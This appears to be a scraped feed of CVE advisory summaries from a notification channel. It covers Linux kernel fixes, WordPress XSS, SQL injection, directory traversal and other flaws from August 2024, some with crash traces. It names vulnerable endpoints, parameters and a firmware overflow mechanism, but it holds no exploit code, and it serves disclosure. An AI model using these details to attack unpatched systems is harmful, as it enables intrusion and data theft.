🚨 CVE-2022-48942In the Linux kernel, the following vulnerability has been resolved:hwmon: Handle failure to register sensor with thermal zone correctlyIf an attempt is made to a sensor with a thermal zone and it fails,the call to devm_thermal_zone_of_sensor_register() may return -ENODEV.This may result in crashes similar to the following.Unable to handle kernel NULL pointer dereference at virtual address 00000000000003cd...Internal error: Oops: 96000021 [#1] PREEMPT SMP...pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)pc : mutex_lock+0x18/0x60lr : thermal_zone_device_update+0x40/0x2e0sp : ffff800014c4fc60x29: ffff800014c4fc60 x28: ffff365ee3f6e000 x27: ffffdde218426790x26: ffff365ee3f6e000 x25: 0000000000000000 x24: ffff365ee3f6e000x23: ffffdde218426870 x22: ffff365ee3f6e000 x21: 00000000000003cdx20: ffff365ee8bf3308 x19: ffffffffffffffed x18: 0000000000000000x17: ffffdde21842689c x16: ffffdde1cb7a0b7c x15: 0000000000000040x14: ffffdde21a4889a0 x13: 0000000000000228 x12: 0000000000000000x11: 0000000000000000 x10: 0000000000000000 x9 : 0000000000000000x8 : 0000000001120000 x7 : 0000000000000001 x6 : 0000000000000000x5 : 0068000878e20f07 x4 : 0000000000000000 x3 : 00000000000003cdx2 : ffff365ee3f6e000 x1 : 0000000000000000 x0 : 00000000000003cdCall trace: mutex_lock+0x18/0x60 hwmon_notify_event+0xfc/0x110 0xffffdde1cb7a0a90 0xffffdde1cb7a0b7c irq_thread_fn+0x2c/0xa0 irq_thread+0x134/0x240 kthread+0x178/0x190 ret_from_fork+0x10/0x20Code: d503201f d503201f d2800001 aa0103e4 (c8e47c02)Jon Hunter reports that the exact call sequence is:hwmon_notify_event() --> hwmon_thermal_notify() --> thermal_zone_device_update() --> update_temperature() --> mutex_lock()The hwmon core needs to handle all errors returned from callsto devm_thermal_zone_of_sensor_register(). If the call failswith -ENODEV, report that the sensor was not attached to athermal zone but continue to register the hwmon device.🎖@cveNotify |
|
| 2024-08-22 18:37:37 |
🚨 CVE-2024-43854In the Linux kernel, the following vulnerability has been resolved:block: initialize integrity buffer to zero before writing it to mediaMetadata added by bio_integrity_prep is using plain kmalloc, which leadsto random kernel memory being written media. For PI metadata this islimited to the app tag that isn't used by kernel generated metadata,but for non-PI metadata the entire buffer leaks kernel memory.Fix this by adding the __GFP_ZERO flag to allocations for writes.🎖@cveNotify |
|
| 2024-08-22 18:37:36 |
🚨 CVE-2024-41600Insecure Permissions vulnerability in lin-CMS Springboot v.0.2.1 and before allows a remote attacker to obtain sensitive information via the login method in the UserController.java component.🎖@cveNotify |
|
| 2024-08-22 18:37:35 |
🚨 CVE-2024-37066A command injection vulnerability exists in Wyze V4 Pro firmware versions before 4.50.4.9222, which allows attackers to execute arbitrary commands over Bluetooth as root during the camera setup process.🎖@cveNotify |
|
| 2024-08-22 18:37:31 |
🚨 CVE-2024-34459An issue was discovered in xmllint (from libxml2) before 2.11.8 and 2.12.x before 2.12.7. Formatting error messages with xmllint --htmlout can result in a buffer over-read in xmlHTMLPrintFileContext in xmllint.c.🎖@cveNotify |
|
| 2024-08-22 18:37:30 |
🚨 CVE-2024-31041Null Pointer Dereference vulnerability in topic_filtern function in mqtt_parser.c in NanoMQ 0.21.7 allows attackers to cause a denial of service.🎖@cveNotify |
|
| 2024-08-22 18:37:26 |
🚨 CVE-2023-49965SpaceX Starlink Wi-Fi router Gen 2 before 2023.48.0 allows XSS via the ssid and password parameters on the Setup Page.🎖@cveNotify |
|
| 2024-08-22 17:37:33 |
🚨 CVE-2024-29736A SSRF vulnerability in WADL service description in versions of Apache CXF before 4.0.5, 3.6.4 and 3.5.9 allows an attacker to perform SSRF style attacks on REST webservices. The attack only applies if a custom stylesheet parameter is configured.🎖@cveNotify |
|
| 2024-08-22 17:37:26 |
🚨 CVE-2024-40725A partial fix for CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.Users are recommended to upgrade to version 2.4.62, which fixes this issue.🎖@cveNotify |
|
| 2024-08-22 17:37:25 |
🚨 CVE-2024-27488Incorrect Access Control vulnerability in ZLMediaKit versions 1.0 through 8.0, allows remote attackers to escalate privileges and obtain sensitive information. The application system enables the http API interface by default and uses the secret parameter method to authenticate the http restful api interface, but the secret is hardcoded by default.🎖@cveNotify |
|
| 2024-08-22 17:37:24 |
🚨 CVE-2023-41099In the Windows installer in Atos Eviden CardOS API before 5.5.5.2811, Local Privilege Escalation can occur.(from a regular user to SYSTEM).🎖@cveNotify |
|
| 2024-08-22 17:07:25 |
🚨 CVE-2024-5555The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘social-link-title’ parameter in all versions up to, and including, 5.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-22 17:07:24 |
🚨 CVE-2024-5554The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘onclick_event’ parameter in all versions up to, and including, 5.6.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-22 16:37:36 |
🚨 CVE-2024-3127An issue has been discovered in GitLab EE affecting all versions starting from 12.5 before 17.1.6, all versions starting from 17.2 before 17.2.4, all versions starting from 17.3 before 17.3.1. Under certain conditions it may be possible to bypass the IP restriction for groups through GraphQL allowing unauthorised users to perform some actions at the group level.🎖@cveNotify |
|
| 2024-08-22 16:37:32 |
🚨 CVE-2024-43033JPress through 5.1.1 on Windows has an arbitrary file upload vulnerability that could cause arbitrary code execution via ::$DATA to AttachmentController, such as a .jsp::$DATA file to io.jpress.web.commons.controller.AttachmentController#upload. NOTE: this is unrelated to the attack vector for CVE-2024-32358.🎖@cveNotify |
|
| 2024-08-22 16:37:31 |
🚨 CVE-2024-42598SeaCMS 13.0 has a remote code execution vulnerability. The reason for this vulnerability is that although admin_editplayer.php imposes restrictions on edited files, attackers can still bypass these restrictions and write code, allowing authenticated attackers to exploit the vulnerability to execute arbitrary commands and gain system privileges.🎖@cveNotify |
|
| 2024-08-22 16:37:27 |
🚨 CVE-2024-42301In the Linux kernel, the following vulnerability has been resolved:dev/parport: fix the array out-of-bounds riskFixed array out-of-bounds issues caused by sprintfby replacing it with snprintf for safer data copying,ensuring the destination buffer is not overflowed.Below is the stack trace I encountered during the actual issue:[ 66.575408s] [pid:5118,cpu4,QThread,4]Kernel panic - not syncing: stack-protector:Kernel stack is corrupted in: do_hardware_base_addr+0xcc/0xd0 [parport][ 66.575408s] [pid:5118,cpu4,QThread,5]CPU: 4 PID: 5118 Comm:QThread Tainted: G S W O 5.10.97-arm64-desktop #7100.57021.2[ 66.575439s] [pid:5118,cpu4,QThread,6]TGID: 5087 Comm: EFileApp[ 66.575439s] [pid:5118,cpu4,QThread,7]Hardware name: HUAWEI HUAWEI QingYunPGUX-W515x-B081/SP1PANGUXM, BIOS 1.00.07 04/29/2024[ 66.575439s] [pid:5118,cpu4,QThread,8]Call trace:[ 66.575469s] [pid:5118,cpu4,QThread,9] dump_backtrace+0x0/0x1c0[ 66.575469s] [pid:5118,cpu4,QThread,0] show_stack+0x14/0x20[ 66.575469s] [pid:5118,cpu4,QThread,1] dump_stack+0xd4/0x10c[ 66.575500s] [pid:5118,cpu4,QThread,2] panic+0x1d8/0x3bc[ 66.575500s] [pid:5118,cpu4,QThread,3] __stack_chk_fail+0x2c/0x38[ 66.575500s] [pid:5118,cpu4,QThread,4] do_hardware_base_addr+0xcc/0xd0 [parport]🎖@cveNotify |
|
| 2024-08-22 16:37:26 |
🚨 CVE-2024-6164The Filter & Grids WordPress plugin before 2.8.33 is vulnerable to Local File Inclusion via the post_layout parameter. This makes it possible for an unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.🎖@cveNotify |
|
| 2024-08-22 16:37:25 |
🚨 CVE-2024-30564An issue inandrei-tatar nora-firebase-common between v.1.0.41 and v.1.12.2 allows a remote attacker to execute arbitrary code via a crafted script to the updateState parameter of the updateStateInternal method.🎖@cveNotify |
|
| 2024-08-22 16:07:42 |
🚨 CVE-2024-43833In the Linux kernel, the following vulnerability has been resolved:media: v4l: async: Fix NULL pointer dereference in adding ancillary linksIn v4l2_async_create_ancillary_links(), ancillary links are created forlens and flash sub-devices. These are sub-device to sub-device links andif the async notifier is related to a V4L2 device, the source sub-deviceof the ancillary link is NULL, leading to a NULL pointer dereference.Check the notifier's sd field is non-NULL inv4l2_async_create_ancillary_links().[Sakari Ailus: Reword the subject and commit messages slightly.]🎖@cveNotify |
|
| 2024-08-22 16:07:38 |
🚨 CVE-2024-42316In the Linux kernel, the following vulnerability has been resolved:mm/mglru: fix div-by-zero in vmpressure_calc_level()evict_folios() uses a second pass to reclaim folios that have gone throughpage writeback and become clean before it finishes the first pass, sincefolio_rotate_reclaimable() cannot handle those folios due to theisolation.The second pass tries to avoid potential double counting by deductingscan_control->nr_scanned. However, this can result in underflow ofnr_scanned, under a condition where shrink_folio_list() does not incrementnr_scanned, i.e., when folio_trylock() fails.The underflow can cause the divisor, i.e., scale=scanned+reclaimed invmpressure_calc_level(), to become zero, resulting in the following crash: [exception RIP: vmpressure_work_fn+101] process_one_work at ffffffffa3313f2bSince scan_control->nr_scanned has no established semantics, the potentialdouble counting has minimal risks. Therefore, fix the problem by notdeducting scan_control->nr_scanned in evict_folios().🎖@cveNotify |
|
| 2024-08-22 16:07:37 |
🚨 CVE-2024-42314In the Linux kernel, the following vulnerability has been resolved:btrfs: fix extent map use-after-free when adding pages to compressed bioAt add_ra_bio_pages() we are accessing the extent map to calculate'add_size' after we dropped our reference on the extent map, resultingin a use-after-free. Fix this by computing 'add_size' before dropping ourextent map reference.🎖@cveNotify |
|
| 2024-08-22 16:07:36 |
🚨 CVE-2024-42313In the Linux kernel, the following vulnerability has been resolved:media: venus: fix use after free in vdec_closeThere appears to be a possible use after free with vdec_close().The firmware will add buffer release work to the work queue throughHFI callbacks as a normal part of decoding. Randomly closing thedecoder device from userspace during normal decoding can incura read after free for inst.Fix it by cancelling the work in vdec_close.🎖@cveNotify |
|
| 2024-08-22 16:07:33 |
🚨 CVE-2024-42310In the Linux kernel, the following vulnerability has been resolved:drm/gma500: fix null pointer dereference in cdv_intel_lvds_get_modesIn cdv_intel_lvds_get_modes(), the return value of drm_mode_duplicate()is assigned to mode, which will lead to a NULL pointer dereference onfailure of drm_mode_duplicate(). Add a check to avoid npd.🎖@cveNotify |
|
| 2024-08-22 16:07:32 |
🚨 CVE-2024-28992The SolarWinds Access Rights Manager was susceptible to a Directory Traversal and Information Disclosure Vulnerability. This vulnerability allows an unauthenticated user to perform arbitrary file deletion and leak sensitive information.🎖@cveNotify |
|
| 2024-08-22 16:07:31 |
🚨 CVE-2024-23472SolarWinds Access Rights Manager (ARM) is susceptible to Directory Traversal vulnerability. This vulnerability allows an authenticated user to arbitrary read and delete files in ARM.🎖@cveNotify |
|
| 2024-08-22 16:07:27 |
🚨 CVE-2024-23468The SolarWinds Access Rights Manager was susceptible to a Directory Traversal and Information Disclosure Vulnerability. This vulnerability allows an unauthenticated user to perform arbitrary file deletion and leak sensitive information.🎖@cveNotify |
|
| 2024-08-22 16:07:26 |
🚨 CVE-2024-23467The SolarWinds Access Rights Manager was susceptible to a Directory Traversal and Information Disclosure Vulnerability. This vulnerability allows an unauthenticated user to perform remote code execution.🎖@cveNotify |
|
| 2024-08-22 16:07:25 |
🚨 CVE-2024-6563Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Renesas arm-trusted-firmware allows Local Execution of Code. This vulnerability is associated with program files https://github.Com/renesas-rcar/arm-trusted-firmware/blob/rcar_gen3_v2.5/drivers/renesas/common/io/i... https://github.Com/renesas-rcar/arm-trusted-firmware/blob/rcar_gen3_v2.5/drivers/renesas/common/io/io_rcar.C .In line 313 "addr_loaded_cnt" is checked not to be "CHECK_IMAGE_AREA_CNT" (5) or larger, this check does not halt the function. Immediately after (line 317) there will be an overflow in the buffer and the value of "dst" will be written to the area immediately after the buffer, which is "addr_loaded_cnt". This will allow an attacker to freely control the value of "addr_loaded_cnt" and thus control the destination of the write immediately after (line 318). The write in line 318 will then be fully controlled by said attacker, with whichever address and whichever value ("len") they desire.🎖@cveNotify |
|
| 2024-08-22 15:37:31 |
🚨 CVE-2024-22243Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.🎖@cveNotify |
|
| 2024-08-22 15:07:26 |
🚨 CVE-2024-7731Dr.ID Access Control System from SECOM does not properly validate a specific page parameter, allowing unauthenticated remote attackers to inject SQL commands to read, modify, and delete database contents.🎖@cveNotify |
|
| 2024-08-22 15:07:25 |
🚨 CVE-2024-25639Khoj is an application that creates personal AI agents. The Khoj Obsidian, Desktop and Web clients inadequately sanitize the AI model's response and user inputs. This can trigger Cross Site Scripting (XSS) via Prompt Injection from untrusted documents either indexed by the user on Khoj or read by Khoj from the internet when the user invokes the /online command. This vulnerability is fixed in 1.13.0.🎖@cveNotify |
|
| 2024-08-22 14:37:25 |
🚨 CVE-2021-31196Microsoft Exchange Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-22 14:07:25 |
🚨 CVE-2023-41919Hardcoded credentials are discovered within the application's source code, creating a potential security risk for unauthorized access.🎖@cveNotify |
|
| 2024-08-22 13:37:31 |
🚨 CVE-2024-41084In the Linux kernel, the following vulnerability has been resolved:cxl/region: Avoid null pointer dereference in region lookupcxl_dpa_to_region() looks up a region based on a memdev and DPA.It wrongly assumes an endpoint found mapping the DPA is also ofa fully assembled region. When not true it leads to a null pointerdereference looking up the region name.This appears during testing of region lookup after a failure toassemble a BIOS defined region or if the lookup raced with theassembly of the BIOS defined region.Failure to clean up BIOS defined regions that fail assembly is anissue in itself and a fix to that problem will alleviate some ofthe impact. It will not alleviate the race condition so let's hardenthis path.The behavior change is that the kernel oops due to a null pointerdereference is replaced with a dev_dbg() message noting that anendpoint was mapped.Additional comments are added so that future users of this functioncan more clearly understand what it provides.🎖@cveNotify |
|
| 2024-08-22 13:37:30 |
🚨 CVE-2024-6409A race condition vulnerability was discovered in how signals are handled by OpenSSH's server (sshd). If a remote attacker does not authenticate within a set time period, then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.🎖@cveNotify |
|
| 2024-08-22 13:37:26 |
🚨 CVE-2024-28200The N-central server is vulnerable to an authentication bypass of the user interface. This vulnerability is present in all deployments of N-central prior to 2024.2.This vulnerability was discovered through internal N-central source code review and N-able has not observed any exploitation in the wild.🎖@cveNotify |
|
| 2024-08-22 13:37:25 |
🚨 CVE-2022-0185A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length. An unprivileged (in case of unprivileged user namespaces enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a filesystem that does not support the Filesystem Context API (and thus fallbacks to legacy handling) could use this flaw to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-08-22 13:07:43 |
🚨 CVE-2024-7964Use after free in Passwords in Google Chrome on Android prior to 128.0.6613.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-22 13:07:42 |
🚨 CVE-2024-20486A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on the affected device with the privileges of the targeted user.🎖@cveNotify |
|
| 2024-08-22 13:07:41 |
🚨 CVE-2024-20466A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain sensitive information from an affected device.This vulnerability is due to improper enforcement of administrative privilege levels for high-value sensitive data. An attacker with read-only Administrator privileges for the web-based management interface on an affected device could exploit this vulnerability by browsing to a page that contains sensitive data. A successful exploit could allow the attacker to collect sensitive information regarding the configuration of the system.🎖@cveNotify |
|
| 2024-08-22 13:07:38 |
🚨 CVE-2024-20417Multiple vulnerabilities in the REST API of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct blind SQL injection attacks.These vulnerabilities are due to insufficient validation of user-supplied input in REST API calls. An attacker could exploit these vulnerabilities by sending crafted input to an affected device. A successful exploit could allow the attacker to view or modify data on the affected device.🎖@cveNotify |
|
| 2024-08-22 13:07:37 |
🚨 CVE-2024-20488A vulnerability in the web-based management interface of Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2024-08-22 13:07:36 |
🚨 CVE-2024-42785A SQL injection vulnerability in /music/index.php?page=view_playlist in Kashipara Music Management System v1.0 allows an attacker to execute arbitrary SQL commands via the "id" parameter.🎖@cveNotify |
|
| 2024-08-22 13:07:32 |
🚨 CVE-2024-42783Kashipara Music Management System v1.0 is vulnerable to SQL Injection via /music/manage_playlist_items.php. An attacker can execute arbitrary SQL commands via the "pid" parameter.🎖@cveNotify |
|
| 2024-08-22 13:07:31 |
🚨 CVE-2024-42780An Unrestricted file upload vulnerability was found in "/music/ajax.php?action=save_genre" in Kashipara Music Management System v1.0. This allows attackers to execute arbitrary code via uploading a crafted PHP file.🎖@cveNotify |
|
| 2024-08-22 13:07:27 |
🚨 CVE-2024-42778An Unrestricted file upload vulnerability was found in "/music/ajax.php?action=save_playlist" in Kashipara Music Management System v1.0. This allows attackers to execute arbitrary code via uploading a crafted PHP file.🎖@cveNotify |
|
| 2024-08-22 13:07:26 |
🚨 CVE-2023-29929Buffer Overflow vulnerability found in Kemptechnologies Loadmaster before v.7.2.60.0 allows a remote attacker to casue a denial of service via the libkemplink.so, isreverse library.🎖@cveNotify |
|
| 2024-08-22 13:07:25 |
🚨 CVE-2024-42101In the Linux kernel, the following vulnerability has been resolved:drm/nouveau: fix null pointer dereference in nouveau_connector_get_modesIn nouveau_connector_get_modes(), the return value of drm_mode_duplicate()is assigned to mode, which will lead to a possible NULL pointerdereference on failure of drm_mode_duplicate(). Add a check to avoid npd.🎖@cveNotify |
|
| 2024-08-22 11:37:26 |
🚨 CVE-2024-39746IBM Sterling Connect:Direct Web Services 6.0, 6.1, 6.2, and 6.3 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques.🎖@cveNotify |
|
| 2024-08-22 11:37:25 |
🚨 CVE-2024-39744IBM Sterling Connect:Direct Web Services 6.0, 6.1, 6.2, and 6.3 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.🎖@cveNotify |
|
| 2024-08-22 11:37:24 |
🚨 CVE-2024-35151IBM OpenPages with Watson 8.3 and 9.0 could allow authenticated users access to sensitive information through improper authorization controls on APIs.🎖@cveNotify |
|
| 2024-08-22 10:37:25 |
🚨 CVE-2024-6870The Responsive Lightbox & Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping affecting the rl_upload_image AJAX endpoint. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the 3gp2 file.🎖@cveNotify |
|
| 2024-08-22 10:37:24 |
🚨 CVE-2024-22162Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPZOOM WPZOOM Shortcodes allows Reflected XSS.This issue affects WPZOOM Shortcodes: from n/a through 1.0.3.🎖@cveNotify |
|
| 2024-08-22 09:37:24 |
🚨 CVE-2024-31256Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebinarPress allows Reflected XSS.This issue affects WebinarPress: from n/a through 1.33.10.🎖@cveNotify |
|
| 2024-08-22 06:37:25 |
🚨 CVE-2024-7263Improper path validation in promecefpluginhost.exe in Kingsoft WPS Office version ranging from 12.2.0.13110 to 12.2.0.17115 (exclusive) on Windows allows an attacker to load an arbitrary Windows library.The patch released in version 12.1.0.17119 to mitigate CVE-2024-7262 was not restrictive enough. Another parameter was not properly sanitized which leads to the execution of an arbitrary Windows library.🎖@cveNotify |
|
| 2024-08-22 06:37:24 |
🚨 CVE-2024-7262Improper path validation in promecefpluginhost.exe in Kingsoft WPS Office version ranging from 12.2.0.13110 to 12.2.0.16412 (exclusive) on Windows allows an attacker to load an arbitrary Windows library.The vulnerability was found weaponized as a single-click exploit in the form of a deceptive spreadsheet document🎖@cveNotify |
|
| 2024-08-22 05:37:25 |
🚨 CVE-2024-0156Dell Digital Delivery, versions prior to 5.2.0.0, contain a Buffer Overflow Vulnerability. A local low privileged attacker could potentially exploit this vulnerability, leading to arbitrary code execution and/or privilege escalation.🎖@cveNotify |
|
| 2024-08-22 05:37:24 |
🚨 CVE-2024-0155Dell Digital Delivery, versions prior to 5.2.0.0, contain a Use After Free Vulnerability. A local low privileged attacker could potentially exploit this vulnerability, leading to application crash or execution of arbitrary code.🎖@cveNotify |
|
| 2024-08-22 04:37:31 |
🚨 CVE-2022-48930In the Linux kernel, the following vulnerability has been resolved:RDMA/ib_srp: Fix a deadlockRemove the flush_workqueue(system_long_wq) call since flushingsystem_long_wq is deadlock-prone and since that call is redundant with apreceding cancel_work_sync()🎖@cveNotify |
|
| 2024-08-22 04:37:30 |
🚨 CVE-2022-48927In the Linux kernel, the following vulnerability has been resolved:iio: adc: tsc2046: fix memory corruption by preventing array overflowOn one side we have indio_dev->num_channels includes all physical channels +timestamp channel. On other side we have an array allocated only forphysical channels. So, fix memory corruption by ARRAY_SIZE() instead ofnum_channels variable.Note the first case is a cleanup rather than a fix as the softwaretimestamp channel bit in active_scanmask is never set by the IIO core.🎖@cveNotify |
|
| 2024-08-22 04:37:29 |
🚨 CVE-2022-48926In the Linux kernel, the following vulnerability has been resolved:usb: gadget: rndis: add spinlock for rndis response listThere's no lock for rndis response list. It could cause list corruptionif there're two different list_add at the same time like below.It's better to add in rndis_add_response / rndis_free_response/ rndis_get_next_response to prevent any race condition on response list.[ 361.894299] [1: irq/191-dwc3:16979] list_add corruption.next->prev should be prev (ffffff80651764d0),but was ffffff883dc36f80. (next=ffffff80651764d0).[ 361.904380] [1: irq/191-dwc3:16979] Call trace:[ 361.904391] [1: irq/191-dwc3:16979] __list_add_valid+0x74/0x90[ 361.904401] [1: irq/191-dwc3:16979] rndis_msg_parser+0x168/0x8c0[ 361.904409] [1: irq/191-dwc3:16979] rndis_command_complete+0x24/0x84[ 361.904417] [1: irq/191-dwc3:16979] usb_gadget_giveback_request+0x20/0xe4[ 361.904426] [1: irq/191-dwc3:16979] dwc3_gadget_giveback+0x44/0x60[ 361.904434] [1: irq/191-dwc3:16979] dwc3_ep0_complete_data+0x1e8/0x3a0[ 361.904442] [1: irq/191-dwc3:16979] dwc3_ep0_interrupt+0x29c/0x3dc[ 361.904450] [1: irq/191-dwc3:16979] dwc3_process_event_entry+0x78/0x6cc[ 361.904457] [1: irq/191-dwc3:16979] dwc3_process_event_buf+0xa0/0x1ec[ 361.904465] [1: irq/191-dwc3:16979] dwc3_thread_interrupt+0x34/0x5c🎖@cveNotify |
|
| 2024-08-22 03:37:25 |
🚨 CVE-2024-5583The The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the carousel_direction parameter of testimonials widget in all versions up to, and including, 5.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-22 03:37:24 |
🚨 CVE-2024-39576Dell Power Manager (DPM), versions 3.15.0 and prior, contains an Incorrect Privilege Assignment vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Code execution and Elevation of privileges.🎖@cveNotify |
|
| 2024-08-22 02:37:25 |
🚨 CVE-2021-4441In the Linux kernel, the following vulnerability has been resolved:spi: spi-zynq-qspi: Fix a NULL pointer dereference in zynq_qspi_exec_mem_op()In zynq_qspi_exec_mem_op(), kzalloc() is directly used in memset(),which could lead to a NULL pointer dereference on failure ofkzalloc().Fix this bug by adding a check of tmpbuf.This bug was found by a static analyzer. The analysis employsdifferential checking to identify inconsistent security operations(e.g., checks or kfrees) between two code paths and confirms that theinconsistent operations are not recovered in the current function orthe callers, so they constitute bugs.Note that, as a bug found by static analysis, it can be a falsepositive or hard to trigger. Multiple researchers have cross-reviewedthe bug.Builds with CONFIG_SPI_ZYNQ_QSPI=m show no new warnings,and our static analyzer no longer warns about this code.🎖@cveNotify |
|
| 2024-08-22 01:37:25 |
🚨 CVE-2024-42056Retool (self-hosted enterprise) through 3.40.0 inserts resource authentication credentials into sent data. Credentials for users with "Use" permissions can be discovered (by an authenticated attacker) via the /api/resources endpoint. The earliest affected version is 3.18.1.🎖@cveNotify |
|
| 2024-08-22 01:37:24 |
🚨 CVE-2024-32358An issue in Jpress v.5.1.0 allows a remote attacker to execute arbitrary code via a crafted script to the custom plug-in module function, a different vulnerability than CVE-2024-43033.🎖@cveNotify |
|
| 2024-08-22 01:07:26 |
🚨 CVE-2022-0185A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length. An unprivileged (in case of unprivileged user namespaces enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a filesystem that does not support the Filesystem Context API (and thus fallbacks to legacy handling) could use this flaw to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-08-22 01:07:25 |
🚨 CVE-2021-33044The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.🎖@cveNotify |
|
| 2024-08-22 01:07:24 |
🚨 CVE-2021-31196Microsoft Exchange Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-21 23:37:25 |
🚨 CVE-2024-2262Themify WordPress plugin before 1.4.4 does not have CSRF check in its bulk action, which could allow attackers to make logged in users delete arbitrary filters via CSRF attack, granted they know the related filter slugs🎖@cveNotify |
|
| 2024-08-21 23:37:24 |
🚨 CVE-2023-42892A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13.6.3, macOS Sonoma 14.2, macOS Monterey 12.7.2. A local attacker may be able to elevate their privileges.🎖@cveNotify |
|
| 2024-08-21 22:37:24 |
🚨 CVE-2024-28987The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.🎖@cveNotify |
|
| 2024-08-21 21:37:32 |
🚨 CVE-2024-27474Leantime 3.0.6 is vulnerable to Cross Site Request Forgery (CSRF). This vulnerability allows malicious actors to perform unauthorized actions on behalf of authenticated users, specifically administrators.🎖@cveNotify |
|
| 2024-08-21 21:37:26 |
🚨 CVE-2024-28732An issue was discovered in OFPMatch in parser.py in Faucet SDN Ryu version 4.34, allows remote attackers to cause a denial of service (DoS) (infinite loop).🎖@cveNotify |
|
| 2024-08-21 21:37:25 |
🚨 CVE-2024-0036In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-21 21:37:24 |
🚨 CVE-2023-40107In ARTPWriter of ARTPWriter.cpp, there is a possible use after free due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-21 20:37:32 |
🚨 CVE-2024-20417Multiple vulnerabilities in the REST API of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct blind SQL injection attacks.These vulnerabilities are due to insufficient validation of user-supplied input in REST API calls. An attacker could exploit these vulnerabilities by sending crafted input to an affected device. A successful exploit could allow the attacker to view or modify data on the affected device.🎖@cveNotify |
|
| 2024-08-21 20:37:26 |
🚨 CVE-2024-42604Pligg CMS v2.0.2 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/admin_group.php?mode=delete&group_id=3🎖@cveNotify |
|
| 2024-08-21 20:37:25 |
🚨 CVE-2024-30850An issue in tiagorlampert CHAOS v5.0.1 allows a remote attacker to execute arbitrary code via the BuildClient function within client_service.go🎖@cveNotify |
|
| 2024-08-21 20:37:24 |
🚨 CVE-2024-0023In ConvertRGBToPlanarYUV of Codec2BufferUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
